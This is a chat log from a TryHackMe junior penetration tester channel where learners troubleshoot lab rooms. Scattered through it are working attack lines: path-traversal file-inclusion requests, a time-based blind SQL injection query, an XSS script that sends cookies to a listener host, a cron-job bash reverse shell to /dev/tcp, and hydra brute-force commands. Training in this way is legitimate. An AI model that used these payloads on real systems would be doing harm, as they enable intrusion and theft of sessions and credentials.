#junior-pentester-path
or maybe i got the wrong exploit?..
No that's the right one
try with this | mount -o rw IP:/tmp /tmp/test
I think you didn't put http:// in front of the IP. As I get the same error when I just enter the IP
Oh right!
Had to put http://
Thank you! Merci beaucoup!
Gave +1 Rep to @shadow echo
yeah i'm totally lost in this. i tried to put the &x=&api=https://server.website.thm/flag?id=9 but it didn't work
You are welcome
So what's the full URL you try?
Like this -> python3 47887.py http://10.10.148.177
yeah, it's asking for the flag 9 and i also tried to put url before it
That message was not meant for you
OOPS
take some rest and clear ur mind if u need
https://portswigger.net/web-security/ssrf
u can read further here
look at the hint carefully. It says ' at the end'
like i saw other examples on youtube and understood it but i can't get past this &x= part
oh i love web academy
only root can mount
What is &x= doing?
The answer is actually in the tasks you did above
if i try to remove the url and just leave the flag it gives me a 504 server error
So again, what will that parameter cause &x=?
where did u run that mount
u must run it from ur attacking machine
to go to the url where flag9 is
You should then reread one of the previous examples in that task, as I think you misunderstood that part.
guys, how did u switch to jack's profile? dll task
understand the logic, dont try to copy from example 4
understand the structure and apply it
use runas command iirc
hey guys, anyone can walk me through lfi challenge 3 ?
done mybad tnx
Yes I did but I think I'm stuck
i checked the prev questions about it
i did everything but i failed again
||POST Request ?||
Unfortunately Yes
Anyone around?
dang
I'll come back later then
@steel nymph have you done the XSS challenge?
I created a ticket with the injected script. Waited a minute....nothing on nc
verified my IP and port.
Is it just me or do we keep getting pentester titles, freeze etc repeatedly?
@rapid kite that's how odds work, right?
most have claimed higher rewards, nth left
It's a matter of percentage
@steel nymph yes
darn it, im one of the unlucky ones i guess :/
https://tryhackme.com/room/tickets2 There are still good prizes available
Or it doesn't update?
doesn't update haha
all 0 claimed for me
Damn
@steel nymph noted. Booting the attack box
same
@steel nymph yeah, not sure why I thought i needed the attack box
can i confirm my command with u? still says cant find a file
||@steel nymph http://10.10.17.62/challenges//chall3.php?file=../../../../etc/flag3 as post request||
sure
Can anyone hit me up with the HYDRA bruteforce of the nmap rooms? its gonna take ages to end
I gotchu
Like literally it's gonna take 1538 hours XD
Kinda edit, wrote nmap and figured out it could lead to confusion XD
Just the lazie password
Yeah
Nope
said nmap because its near the rooms of nmap
hydra -l lazie -P /usr/share/wordlists/rockyou.txt 10.10.98 imap
its bruteforcing
but
[STATUS] 155.43 tries/min, 1088 tries in 00:07h, 14343343 to do in 1538:03h, 16 active
You can tell
XDXDD
10.10.98?
@steel nymph i think i am still lost, i am sending post request from inspector in my browser
got it for the next time! Ty
Gave +1 Rep to @steel nymph
@steel nymph do you happen to know if the injection has to be on a specific ticket ID? I'm still not getting anything even with the THM capture tool (but it displays my cookie when I view the ticket).
If you sure to use the right payload, I would restart the machine. At first I also didn't receive anything, probably because I had already 5 or 6 tickets in there, but after the restart and creating a single ticket with the correct payload it immediately worked.
@shadow echo ok.
I can see my cookie gets sent when I view the ticket. So it must be the correct payload. right?
Should be, yes.
Can I Dm you @steel nymph ? still i cant make it work
hack the planet
@shadow echo @steel nymph finally got it! Thanks for the help
Gave +1 Rep to @shadow echo
do anyone got the last flag of sq;_injection room
can you help me out
I have find the table_name
what should I do after that
how were we supposed to know this? i tried looking up the referenced GitHub page and I didn't see it there either.
ahh. it IS in task5. i only looked up until task4 since they said it was the same machine
thanks
Gave +1 Rep to @steel nymph
blind sqli-time based
SSRF is driving me nuts, when submitting a request the &x= is not changing to ?x=
what should i do
i am
it stays the same
Stuck on LFI Challenge Task1
trying DEV Console>Network. Changing Method to POST and Query String: file=../../../../etc/flag1
But, no luck with error or flag. any clue?
&x= will work and check your url read the &x= part again
I am putting in on URL section next to Method
/challenges/chall1.php?file=../../../../etc/flag1
okay
thank you @steel nymph
Gave +1 Rep to @steel nymph
why?
I've never heard anyone claim that and I've never put a space like that
thank you @steel nymph is the best
Gave +1 Rep to @steel nymph
Thanks @steel nymph
Gave +1 Rep to @steel nymph
Which button would we choose to send an intercepted request to the target in Burp Proxy?
hi
in linuxprivesc room of junior-pentester-path i cannot find the answer of this question What vulnerability seem to affect the kernel of the target system? (Enter a CVE number)
i searched in exploit-db and i found 2015-1328, but it seems to be incorrect
File Inclusion Task 4, Q2.... am just not getting what to do...cant seem to figure out what the file is with includes. Help please
you need to write it with CVE-2015-1328
ow thankssss
and i've got one more question
in protocols and servers room, i cannot connect to telnet via this command:
telnet ip 80
it says that your connection is closed by foreign host
PM
anyone ?
did I miss something? (wouldn't surprise me)
I cannot seem to find the user/pass to get on the windows privesc box on task2
thanks, now i feel lame for even asking, haha
my password file had that password in it, i just didn't try that user
well i wanted to ask before i used a bigger file
i think that it would be the forward button, although i dont have it open right now so i cant verify
@steep bolt @modest arch I also got that info twice, "Tickets for this room already awarded". This time it happened with Passive Reconnaissance room, I've tried to reset room progress after that message but the same info was shown. Maybe it gives you tickets you already have ?
It is still giving tickets, but will not show you what one
so when you see this notification, just go to the Tickets on your public profile and check
Hey guys, I'm having issues with the LFI Task 8 - Challenge 2. I've tried searching through this room and I've managed to change the cookie and can view the warning messages, however, I've tried variations of the path as the cookie's value and I'm not making any progress. Anyone have any hints?
@steep bolt but I checked ticket table and there was no new tickets ...
maybe you got again 1 day streak freeze and 7 day streak freeze?
Hi guys! How do you log with Jack's account in Windows Privesc, task 5?
probably, that's the case. But I cant be sure about that.
I got like 10 tickets of 1 day freeze...
I did try the same path with and without the nullbyte to remove the .php that it's adding, but no matter what I try I don't end up with a flag
Will do! Gonna try a couple more things first real quick and if that doesn't work I'll do that. Thank you!
Gave +1 Rep to @steel nymph
Me too but you know. You start the room, you make it, then you check your tickets, and site tells you that "Tickets for this room already awarded". So that kind of a message is weird ...
For Windows Privesc, the command "sc stop dllsvc & sc start dllsvc" does not work, because "&" is not allowed. I tried to break the command into two commands but nothing happened except it has created two new files named "stop" and "start". Also, I can't try to log as Jack, I can only try to log as "Administrator" or "admin_account".. i'm a bit confused! ^^
are you trying it in powershell or the cmd prompt?
I'm trying in powershell! should be in cmd prompt? ^^'
sc is a cmd only command so yes. also for logging in, try using the flag -credentials "" when running something in powershell
i dont like how windows splits powershell and cmd commands, personally. gets annoying
oh wait it should be -credential "" my b
linux ftw
absolutely
thanks! I will try! I thought all the commands were through powershell.. !
nope, they're not
powershell is scripting, and cmd.exe is for actually controlling the computer. its funky
I mean, powershell can control the computer
Need some clue with LFI flag3.
Trying Change method to POST on inspector and input ?file=../../../../etc/flag3%00 on form. But, no luck its showing Warning: include(?file=../../../../etc/flag3%00.php ! Why its showing .php after using Null Bytes!
you are still using .php
use the burpsuite interceptor and inspect it there, you'll see whats the issue
I am not good at using burp yet
cookie value of admin + whatever else i try just not working lol....
why don't you try by removing admin part and try....
I'll try and give you more steps to get through it || so when you grab it with the interceptor, you can pass it over to the repeater. in the repeater, you can see what's getting sent and how it was changed from your original input. you can change it in the repeater and then press the "forward" button to send it through ||
Hi guys, I am stuck in SQL-Injections. I'm not able to find the right query in "Blind SQLi - Time Based" . May someone help?
where have you gotten with it so far?
i dont get it lol
damn I am solving the https://tryhackme.com/room/protocolsandservers2 lab
try to play with cookie
just change admin to some different thing and see what happens
hydra brute forcing for 15 min
use a wordlist instead of bruteforcing, at least for these that should cover it
UNION SELECT SLEEP(5), 1,2,3 from usernames where username like 'a%'--
oh then thats not brute forcing
and what you get? Time?
so the point of it is that if it's correct, it will wait 5 seconds. so you go through each letter there to see whether it's correct or not. so go through 'a%', 'b%', 'c%' and then continue with 'aa%' and then you'll know whether or not its right
0.001, don't know if this is right
yeah it is
bruteforce would take forever with thm so its not worth it
anyway, what wordlist are you using? 15 minutes is a long time
for THM that is
Who available for dm regarding LFI Task 8?
I figured it out but not sure why it is how it is
I also have the same question as @hexed coral
Seems like an incorrect # of paths
huh, 15 minutes is a while but it seems like you're doing it right
I just finished lfi 2, stuck on 3
|| hydra -l lazzie -P /usr/share/wordlists/rockyou.txt 10.10.125.147 imap ||
this is the code
I dont think there is smth wrong with this
is it using cpu or gpu as a source?
put it in || spoilers || so that people who don't want the answer don't see it
but that looks fine, just seems like its taking oddly long. is imap on a nonstandard port?
like does it give you any response
has anybody had trouble accessing the acmeitsupport webiste from their attackbox?
double check the port that its running on, or if you just spun up the box wait another minute
you are using sleep(5) for a reason... Read the explanation well and you will see why
well, from what i can tell it looks right
yeah, but sometimes I don't get any response.
and to access it, you should be able to just pull up a browser and go to acmeitsupport.thm, right?
think on it as a game of guessing. first you will guess one parameter, then, the next one. The difference on the response is the indicator which tell you if you got something or not
if it's running on a nonstandard port it would be <ip>:<port>/<page>
thanks
np
How do you find what tickets you have already earned?
go to your public profile page, the click tickets
@sterile crescent thank you for that. I've been pulling my hair out on the LFI room and used up all my brain for tonight lol. cheers.
Gave +1 Rep to @sterile crescent
I was able to figure out LFI Task 8 Flag2, but I'm confused as to why it's ||4 directories deep and not 3 (going off the current path shown)|| can anyone help clarify?
I got it by mostly guessing, but I'd like to understand it
type on the cookie something different and check what the error shows
@red wraith thanks for the help
Gave +1 Rep to @red wraith
Yeah. I got the flag, but the error implies that the directory is only ||3 deep, meaning I'd only need ../ 3 times, but I needed 4.||
I dont have the exercise loaded now,|| I think that it had two different URIs||
I guess I'm mostly just not clear on why the 'current path' isn't what I use to determine how many directories I need to move up. The current path it's showing is one fewer directories than I actually needed to move
|| when redirecting out like that, you need to add an extra one to get it to move out of the first directory (the file). its a weird little interaction ||
Oh....
yeah
its a really weird funky thing, but since the file isn't directing you out, you have to drop out the file first
I may have just been staring at this too long, but I'm not sure I understand what you mean by the file not directing me out
its a programming thing. normally when an app is reaching out for a directory, it just reaches out on its own. you have to exit the file yourself
so one set of ../ takes you from /var/www/html/file.html to /var/www/html
if that makes sense
good explanation
when you factor in the file into your current path, it takes one more to exit out
It does. Thank you for clarifying that for me. Spent 2 hours trying to figure it out and got it by guessing and that confused me more ahaha
Gave +1 Rep to @sterile crescent
no problem, its weird and hard to know unless you've done programming and path traversal in apps
Is it always one additional to exit the file? Since the page itself is chall2.php, I need to exit out of the page, whereas if it wasn't the open page I wouldn't have to. is that correct?
it's normally one additional to exit, but it's not always
I recommend starting with just one back and going up until you hit root
but there's always an open page, the default will usually be something like index.php
Understood. Thank you again! You saved me from confusion and frustration!
Will the tickets box ever update with how many of the various rewards were claimed?
i'd like to know if OSCP / JPT have already been claimed
I don't know. I recommend worrying about that when you potentially win
What issue?
what lol
what's that supposed to mean
doing the stuff is more important than winning anything, and it's unlikely you win anyway. I didn't end up getting anything so it was just worry for nothing. just how I see it though
Thanks @steel nymph for all the valuable inputs today!
Gave +1 Rep to @steel nymph
Hmmm, doing exercises is more important than career boosting certs
Nah I'll still go for the certs thank you
For sql injection room, Task 8 (Blind SQLi-time Based) : I think I found the room by having a 5 second delay after
referrer=admin123' UNION SELECT SLEEP(5),2 where database() like '[MY_ANSWER]';--
but I dont gain access to the next site
the point is you keep doing that to find the database, table, users, and all that. then you get the user and password as an output after you get all of it
its a lot of trial and error, and time
son of a ....
Thanks @steel nymph @sterile crescent
Gave +1 Rep to @steel nymph
Thanks @sterile crescent
good luck
damn does this bot not give reps to multiple people
robocop doesnt want me to get rep
rip
what does rep even do
nothing lol
welp doesn't really matter then
Okay, the robots.txt link and the sitemap.xml link are not loading
in content discovery? anyone else experienced this?
But the rest of the sites are working?
yeah
the robots.txt file was just working for me like 20 min ago
im connected to openVPN
i wouldnt know of anything causing that issue, you can always restart the computer though
Well I did it through a VM and I restarted the VM but it's still happening
i mean the target computer
Is openvpn running directly inside your VM or on your host machine?
inside the VM
You could give that one a try: sudo ifconfig tun0 mtu 1200 in case it doesn't solve your issue just put it back to 1500.
not working 
Then you might want to restart the target machine, or try clearing your browser cache.
still stuck with lfi flag 3. may i get some clue to pass it through?
Depends on what you have achieved so far. Are you able to bypass the filter so that it's requesting /etc/flag3 instead of etcflag ?
getting this : ?file=../../../../etc/flag3%00.php
as error
sending POST request through dev console>Inspector and putting ?file=../../../../etc/flag3%00 as input on form
Hello everyone,
I am in the fileinc room on task 5. I believe my brain is shorting out but I can not figure out the 2nd question. For which function is causing the directory traversal. any help would be appreciated. Thanks
:O
yeah
thanks
I think I need a break after that one. Thank you lassi
Gave +1 Rep to @steel nymph
can't figure out!
I would try to check that request in the network tab. And then right click on it -> edit and resend. So you can check the request body again.
So did you check it in the dev tools yet?
yes, trying on dev tools
but no luck
So how is your request body looking like?
Method: POST
Query String: file=../../../../etc/flag3%00
There should be no query string field if you are making a post request.
I tried from Inspector earlier
Dev Tools>Network>Edit & Resend>New Request
Right, so if you change the method to POST, the query string field should disappear. So you have to put your payload into the request body field.
I am changing URL too
got it! I was putting ? thats why query string show up. Now putting payload on body, but, did not get the flag yet
So what did you put in the request body field now?
file=../../../../etc/flag3%00
Alright, so there is one more thing for you to figure out now, as I assume the initial request that you edited in the network tab was a GET request, you are missing a header now. So you need to figure out what header you have to add for the POST request.
It is POST as I see
For example you could open a new tab and make the post request the way you did it previously, by using the inspector to change the GET to POST and then compare the header.
Done, it was fun. Most hard and enjoyable was LINUX PRIVESC
Or you google "POST request header"
Hey @here can I get some help with the last part of Task 6 on the Windows PrivEsc? || I'm having a hard time finding what the name of the executable is supposed to be, I assumed it would be unquotedpathservice.exe but that's not what it wants from me.|| Any ideas?
Edit: I ended up just brute forcing it but would appreciate insight on how to actually get it
OH
I misread that at first. Thank you
Thank you!
Gave +1 Rep to @shadow echo
Man, my freaking payload doesn't wanna work
nvm, when in doubt in windows just swap between cmd and powershell
always does magic
Do I need to host a file on a website to execute the hostname command via RFI?
yep, but I am using a shared IP, will it work?
Yeah. Just python -m http.server, and usually the box already has something on port 80 so python -m http.server 1337 or something to specify the port
As long as you're on the VPN you'll be fine. Don't use your external IP
okay
If you're using attackbox use the IP at the top of your terminal
can somebody help me with linux privesc?
i tried to privesc with at and base
and didnt worked
i found passwords in shadow file
but is encrypted in sha512
and i cannot decrypt i dont know how
task 7
yes i get that flag
i tried a lot of ways
yea now im trying that
now worked
i tried from another site and it didn't work
Trying to inject this text file for RFI from my local server http://0.0.0.0:9090/hn.txt no luck....
I finally got past the phone verification.. I'm having the same issues as you capt. jack
Have you verified that if you put that path into your browser you are presented with the file?
0.0.0.0 ? How should that work ?
For me, I can hit the file via my local ip/filename but all I get from the playground is "File Content Preview of http://10.0.2.15/rfi.txt" then nothing
I am using updog
0.0.0.0 usually means all interfaces
No clue what that is, but if you try to include that URL in the RFI, how should that get resolved to your machine/ updog thing?
Am I using this URL correctly then? ||http://10.10.128.242/playground.php?file=http://10.0.2.15/rfi.txt ||
yes
so it should work, right?
If I'm right, if you ping 0.0.0.0 from your webserver, you should get the loopback ip address returned
So I don't think it'll work
http://192.168.10.107:9090/hostname.txt this one should work then
I can access this server from other machines on my network
I'm trying to do the authentication bypass room and the ffuf command doesn't seem to be working. I was using the provided command ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/signup -mr "username already exists"
Also it takes about an hour for it to fully run
and outputting to a file doesn't yield anything
Hey there on a side note, why is it that when I use a file from either google drive or drop box not being recognized when sharing them as raw links. From my understanding they are servers too right? Is it because it has to do with the HTTPS nature of the share link, can you please clarify?
For me, I don't think the external server is able to reach my file as when I attempt to reach the file locally, the terminal hosting the server state something like "GET /rfi.txt HTTP/1.1" 200 -"
But when I try from the playground nothing appears, so that to me states that the playground can't reach my file
Definitely need help with this :/
what will be the content of the file?
that txt file
Get a meterpreter session on the target machine.
you can use xhydra
thats a good idea, but this room is for RFI we should try RIF
I tried the example: <?PHP echo "Hello THM"; ?>
But got nothing, then I removed the echo command and tried hostname with no change
i believe you can and it downloads the txt file not html
Yep able to curl
same here, but no luck.... in my case the page is taking time to load but not getting any error message. don't know what that means
nm
Genius
So you and I are literally in the exact same pickle -_-
First of all I would make sure that the file you are hosting is accessible. So therefore just open a new browser tab on your machine and enter the URL http://10.0.2.15/rfi.txt . In case you can access it, you can start trying to do the RFI on the playground website.
Tested it and I can hit it just fine, I even get feedback on the terminal running the webserver that the file was accessed.
yes, i can access the file from a new tab, its downloading
When trying the RFI website, I get nothing back and the terminal doesn't show any sort of access attempt
Okay, so as you know the file is accessible you can start trying to do the RFI. I can't remember at the moment on how the task was done, but I think it wasn't too complicated.
Lfi + zap + fuzzer = best friend
I think I tried the box as well as url, but I'll give it another shot
Nope, same issue whether in box or url
||<?PHP hostname; ?>||
^^^payload
Can I try to access that file? As I don't think that's working
So if I understand you correctly, I literally need to ||put http://10.0.2.15/rfi.txt into the box then click "Include"||, yeah?
It's my device IP. I run updog server on my device. And, it's showing 0.0.0.0:9090 as my server address. 192.168.10.107 is my device ip. and, i can access the file (http://192.168.10.107:9090/hostname.txt) from other devices on my network.
Yes, because you are on the same network as that other device.
Whats your tun0 ip? Is the one you use
Well I'm doing it correctly, but shouldn't the server be able to access it as I'm on the same vpn network? Or will I need to spin up an attack box vs using my kali box?
how can I host it on thm! I am using vpn, doesn't that make my device a device of the thm network?
same question
also, what will be the content of the file?
capt, did you connect to THM openvpn?
yes
I think as like Jabba said, 0.0.0.0 means all interfaces, you simply have to change the 192.168 IP with your tun0 IP. Provided that you are hosting it on the machine that's connected to the THM network.
you should be using your tun0 as ip
If we didn't have the vpn up, we shouldn't be able to access the playground at all
how can I find my tun0 IP
I'm sorry if I'm being obtuse, but I'm happy to do whatever you need to make progress
ifconfig is deprecated
did it earlier and got 192.168.10.107
Use ip a s tun0
got it!
You got that IP as tun0 IP or you mean as eth0 IP ?
Progress! I can see the requests from the playground server now, but I'm guessing my payload is incorrect as I'm not getting the hostname
what was your payload?
ip a s tun0
4: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 500
link/none
inet 10.9.3.225/16 scope global tun0
valid_lft forever preferred_lft forever
inet6 fe80::826f:ff2:73a9:aae5/64 scope link stable-privacy
valid_lft forever preferred_lft forever
not working
and on ifconfig it's showing inet 192.168.10.107
I really appreciate the help! Seriously, thank you very much
Gave +1 Rep to @steel nymph
which IP works for you?
What is not working? I do see your tun0 IP now?
is this one? 10.9.3.225
Yes
The tun0 ip from ifconfig
That seems more correct
Test if you can access the file from your browser using that ip
both are same IP 10.9.3.225. and I can't access the file from my browser
On the attack box, spin up a server on a port of your choice, then use ifconfig once to check your eth0 address. Once you copy the URL paste it in the playground and the file should execute. This worked for me on the attack box
i am going to try attackbox
content will be just hostname, right?
@viral token The payload I posted earlier is almost correct, you gotta do something to execute the hostname command
ok
i am trying from attackbox, but, couldn't get the file!
it's showing the same 0.0.0.0 on the attackbox too and guess what, there is no tun0 ip on the attackbox.
Again, like Jabba said, 0.0.0.0 only means all interfaces. And on the attackbox you are not connected to the vpn (because there is no need for it as you are on the same network as the target machines) and therefore you have no tun0
I don't catch
ok. thank!
Gave +1 Rep to @shadow echo
Any chance someone knows why ffuf isn't working in the authentication bypass room? I'm using the example but for some reason it isn't finding anything and is also taking an hour at a time to run
This is the command: ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.140.70/customers/signup -mr "username already exists" -o valid_usernames.txt
The output file doesn't list anything useful mostly just configuration stuff.
I think you don't need the last output part
That's just for outputting to a file
otherwise it doesn't seem to output anywhere
Just kinda ends
{"commandline":"ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d username=FUZZ\u0026email=x\u0026password=x\u0026cpassword=x -H Content-Type: application/x-www-form-urlencoded -u http://10.10.140.70/customers/signup -mr username already exists -o valid_usernames.txt -o valid_username.txt","time":"2021-10-26T01:16:37+01:00","results":[],"config":{"autocalibration":false,"autocalibration_strings":[],"colors":false,"cmdline":"ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d username=FUZZ\u0026email=x\u0026password=x\u0026cpassword=x -H Content-Type: application/x-www-form-urlencoded -u http://10.10.140.70/customers/signup -mr username already exists -o valid_usernames.txt -o valid_username.txt","configfile":"","postdata":"username=FUZZ\u0026email=x\u0026password=x\u0026cpassword=x","delay":{"value":"0.00"},"dirsearch_compatibility":false,"extensions":[],"filters":{},"follow_redirects":false,"headers":{"Content-Type":"application/x-www-form-urlencoded"},"ignorebody":false,"ignore_wordlist_comments":false,"inputmode":"clusterbomb","cmd_inputnum":100,"inputproviders":[{"name":"wordlist","keyword":"FUZZ","value":"/usr/share/wordlists/SecLists/Usernames/Names/names.txt"}],"inputshell":"","matchers":{"regexp":{"value":"username already exists"}},"maxtime":0,"maxtime_job":0,"method":"POST","noninteractive":false,"outputdirectory":"","outputfile":"valid_username.txt","outputformat":"json","OutputCreateEmptyFile":false,"proxyurl":"","quiet":false,"rate":0,"recursion":false,"recursion_depth":0,"recursion_strategy":"default","replayproxyurl":"","stop_403":false,"stop_all":false,"stop_errors":false,"threads":40,"timeout":10,"url":"http://10.10.140.70/customers/signup","verbose":false}}
it doesn't echo out the output?
it will show you the output on the screen
and, if you want to get a file read ffuf man page
It's simple just look at the whole problem
remove the output part or fix it with proper formatting. you can't output a text file. as well as you need to give the ffuf command the file formatting. Reading the man page or help menu will help
wait
I got it to work now
Yeah
I restarted the machine and that did the trick for some reason
Only took 5 seconds to run rather than the hour I've been dealing with so far
are you guys working on the Fileinc challenge seeing a 405 error?
I was trying to do the auth bypass room
The room cross-site scripting task 8 I am not receiving any cookie neither in listener nor in tryhackme request catcher.
Btw by tapping the ticket ID I get my own cookie but we need the support-staff cookie.
Could anyone please help??
I just forgot to click to redeem tickets, did I have to click them
Yes
yeah maybe you have to reset the room and answer again to all the question then you will be prompted to click them again
windows privesc can someone explain how to download the powersploit on the web based windows machine i'm supposed to exploit i get nothing but errors
Anyone having issues with Windows PrivEsc DLL Hijacking - it will not let me start the service
@tardy phoenix I was getting the base64 encoded session cookie, decoded it, but when I submit the answer it will not accept it. I was using the netcat method on my vm with the browser used also in my vm.
There is this line in active recon (Task 6 final paragraph - Last line) "You can find a recording of the process below. Note that the listening server is on the left side of the screen." (I think there is no video/recording?)
Is anyone else running into this in the XSS room? I've restarted the AttackBox twice just in case but to no effect.
how much time until the giveaway is over?
27th
Hello guys, I'm doing the LFI room and I'm sooo stuck at the third challenge
the one where everything seems to be filtered
Do you have any hints?
You want hint?
yep
Hint request
is base on time zone?
Are you stuck on the Lab3 challenge?
yep, the third challenge
https://tryhackme.com/room/winprivesc - There's a bug with Task 5 - you cannot start or restart the service "dllsvc" you get an error message
how did you try?
i managed to get /etc/passwd by sending the parameter in the POST request
are you using dev tools or burp?
how do you send POST request?
Burpsuite and curl
curl -X POST -d 'file=../../../../../etc/flag2%00' http://10.10.187.133/challenges/chall3.php
congrats!
maybe check your path properly....
what would be the path?
Post ||/challenges/index.php/etc/flag1||
???
@viral token
read LFI tutorials again from the dot-dot-slash section @sullen perch
Did not get nc incoming by using this xss script: </textarea><script>fetch('http://10.9.3.225:9001?cookie=' + btoa(document.cookie) );</script></textarea>
need some clue
I had an issue with this too and eventually just restarted the machine, used the listener at 10.10.10.10 and made a new ticket.
No issues with netcat with any other room, so I'm not sure why it went weird
I tried THM request catcher and got the staff-session
may be something wrong with nc connection
how could i get base64 if I remove btoa!
btoa() command base64 encodes the victim's cookies.
probably i didnt encode lol
should also work with btoa() too
Complete noob here. Doing the JR PenTester path and stuck on the 'Authentication Bypass' (Task 3). Can anyone offer assistance/walkthrough to offer a different perspective in it?
The Brute force one? I believe it's almost identical to the information in the task, substituting your machine IP and wordlist location. Do you have wordlists?
I think so... I am just stumped on how I arrive at the solution. I am probably thinking about it too hard
check out your wordlist location if you are using one
also, make sure the terminal is in the same directory as the valid_usernames.txt file.
Can someone help? I'm missing something
Maybe re-reading this paragraph?
need help for the room Protocols and Servers 2
ok
Linux PrivEsc task 9 Privilege Escalation: Cron Jobs. I added the bash in the target's backup.sh and then opened the listener from Linux. But the job doesn't seem to be running. Anyone can help?
The backup.sh file contains:
cd /home/admin/1/2/3/Results
zip -r /home/admin/download.zip ./*
#!/bin/bash -x
bash -i >& /dev/tcp/<my ip address>/1111 0>&1
did you make it executable?
Yes, I chmod 777 backup.sh file
It shows ./backup.sh: connect: Connection timed out
after executing the backup.sh
Are you using the attackbox or THM Kali? Or are you using your own machine?
I am using Kali Linux VM
Ok, so you need to use your tun0 IP. That's the only address that the target machine can talk to you using
Can anyone please help me with
Protocols and Servers 2 : TASK 6 question plz
When I enter this command (hydra -l lazie -P /usr/share/wordlists/rockyou.txt Machine_ip ssh) as told in the explanation, it should not take more than 5 min
It has been 14 min now
Oh sorry, I did not see it. My bad
Thanks a lot I was looking since 1 hr
Gave +1 Rep to @steel nymph
I don't think so, I've had that message before and not gained any tickets
Hmm maybe I guess
hello, I need help with the Windows priv escalation room task 6. It says: "Obtain Administrator privileges on the target machine. What is the content of the flagUSP.txt file?"
I have already established a meterpreter session successfully, but when trying to escalate using "getsystem", all of the methods fail
I have also used all of the available exploits that appear when I use "search uac" but none of them seems to work :(
has anybody got the room complete?
Those methods are for when you already have admin privs
and for when you dont have admin privs?
what should I do?
Escalate
yeah but how
Help with flag2 please.
Using Burp I've changed the cookie value to|| "admin"||. I've input invalid cookie values to see current path - ||/var/www/html/chall2.php||.
So I changed URL to - ||*http://10.10.57.78/challenges/chall2.php?file=../../../../etc/flag2 *||
Other than the two values "Guest" & "admin" values, I'm unsure how else I could alter cookies to find the flag.
Does Content-type: also need to be added on this challenge?
look at correlation between cookie value and file content preview
Is there an ||admin|| directory?
That's a negative.
any help with this message? @full escarp @left cove @upper quarry @drifting drum
Thanks @steel ice I got it.
Gave +1 Rep to @steel ice
dm me
Hey guys, I am stuck in the authentication bypass room of the Jr. Penetration Tester path, where we have to bruteforce and use ffuf and find the username and password.
I know I am writing the correct command. When I use the filter -fc 200, I can see that one matching credential is found, but when I use the same command and use ">> filename.txt" to fetch the output on the txt file, there is no output seen there
Can anyone help me with this?
What am I doing wrong here ?
Use ffuf -h to see what flag you have to use to write output to a file
When I don't use the -fc 200 switch to capture all the http 200 msgs, and then use >>filename.txt to print the output. At that time it works.
Maybe post the full command you are using in here. But that would indicate that you are only getting 200 responses and that's why you get output, but all the responses that are 200 are not of interest in that case.
thank you...I returned to this and found this to work for me too....F..... CVE-(year)-(number) format seems to work for anyone on Task 3 of Linux Priv Esc.
Gave +1 Rep to @lean ridge
Hi. I need help with Linux PrivEsc room task 6. The 'simple c' code doesn't give the root permission. And I already researched on Google but no luck.
Hopefully someone can help me.
Yes! same as. I rebooted the vm twice and no joy. Anyone else?
You shouldn't need any code for task 6
How can I find Frank's pw hash? I have no idea and found zero resources about it
gtfobins
Look at what you can use sudo with. If you don't know how to use those to your advantage check gtfobins
As far as I know you don't need to crack it
lol my bad
i mean the plaintext password xD
Thanks!!!!!!
Gave +1 Rep to @full escarp
Hi, I am stuck on the same VM. The machine doesn't have the gcc compiler installed and I can't install anything new due to not having root permissions. Any help here?
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
Ya as they said, and i also tried it. Until the last question, u do not need to compile anything
OK now i see and understand thanks so much !
yes
Hi, in the cross site scripting room I used the supplied xss payload, but I did not get a response, even from myself I get no response. I used the log catcher and nc on my local machine. Any ideas?
the Javascript console might tell you why it is not working
It says Type Error and mixed content blocked
This is what it says right before the task: </textarea><script>fetch('http://{URL_OR_IP}?cookie=' + btoa(document.cookie) );</script>
It's the last Task 8
can anybody give me a tip to where the flag is on this question:
Obtain Administrator privileges on the target machine. What is the content of the flagUSP.txt file?
feel free to DM me, thank you
I forgot to tell in this error it also says NetworkError when attempting to fetch resource
thanks I just found it, every time I do a search like this it kills my shell though for some reason. Or I'm just not patient enough to let it finish
Yes and with the tun0 ip
Hey may I get some help with a NTLM hash?
It asks for Pirate's hash and i did the hashdump, got rid of the user and the PID but the NTLM isn't working
I know i must be doing something wrong but i dont fall for it rn
Yeah the LM:NT
@steel nymph do you have a working payload? I found a slightly different way to get the cookie, but would be really interested how to bypass this browser blocking, if it is possible
Imma check it out anyway, ty!
</textarea><script>fetch('http://924e61e91ca6bd7fba93221c0ddb2c95.log.tryhackme.tech/' + btoa(document.cookie) );</script>
close it )
what?
what task are you at? lemme check if i can help you
Cross Site Scripting Task 8
I restarted it earlier but I can try again
Your directory is not correct
Thanks after restarting it worked immediately
Gave +1 Rep to @steel nymph
Feel free to DM if anyone is having issues or needs a sanity check
Can't see where is the trouble, that worked fine for me tho, even tho i tried with IP + port on a nc listener
Didn't read this lul
Yes thanks maybe it's a little buggy
Glad it worked mate
File Inclusion Task 5 - Question 2. I can't seem to find the answer in the text.
It asks me what the function is causing the directory traversal in Lab #4 but I can only find the name ||"current directory trick"|| which it doesn't accept.. can anyone help me in the right direction?
I already completed the lab but I don't know the exact name.
Thanks!
Gave +1 Rep to @steel nymph
Hi. May I know what timezone TryHackMe uses? Just want to know how many hours are left before this event ends. 27 / 8 right
The path doesn't go away, just the promotion.
It ends 27th October, midnight UTC/GMT
Oh so it's at 11.59 pm on the 27th
Midnight.
Hey, guys! Sorry if it is a dumb question, and especially if this isn't the room I should be asking in, but does this mean that globally the tickets are limited? Like for instance If I am trying to get a 3 month premium ticket, could it be that there are no more left?
That's not been updated, but yes the number of prizes is limited
Also #900054423588470854 for more info
Thank you! That kind of explains why I haven't been able to get anything that I need in those last 3 days
It's also weighted for the lower value prizes, of course
That's to be expected, but I just wanted to know whether the limitation is a factor. However, I will keep trying until the event ends. It's an awesome path anyways, and I'm learning a lot from it!
